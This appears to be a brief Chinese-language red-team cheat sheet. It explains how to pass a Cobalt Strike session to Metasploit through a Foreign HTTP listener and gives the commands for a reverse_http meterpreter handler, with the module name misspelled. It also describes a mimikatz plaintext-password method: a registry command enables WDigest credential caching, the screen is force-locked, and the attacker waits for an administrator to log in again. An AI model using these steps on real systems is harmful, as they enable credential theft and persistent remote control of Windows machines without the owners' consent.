CS到MSF的权限传递
1. 在CS服务器上创建一个Foreign HTTP监听器,设置监听的IP和端口为MSF监听的IP和端口。
2. 在CS客户端上执行新建会话,并选择之前创建的Foreign HTTP监听器。
3. 如果一切设置正确,MSF界面上将显示新的会话,表示权限传递成功。
设置监听端口
use exploit/multi/hander
set payload windows/meterpreter/reverse_http
set lport 4444
exploit
mimikatz抓取明文密码
现在windows缓存表不存在明文密码,所以抓取明文密码的步骤为:
手工修改注册表
强制锁屏
等待管理员重新登录
修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f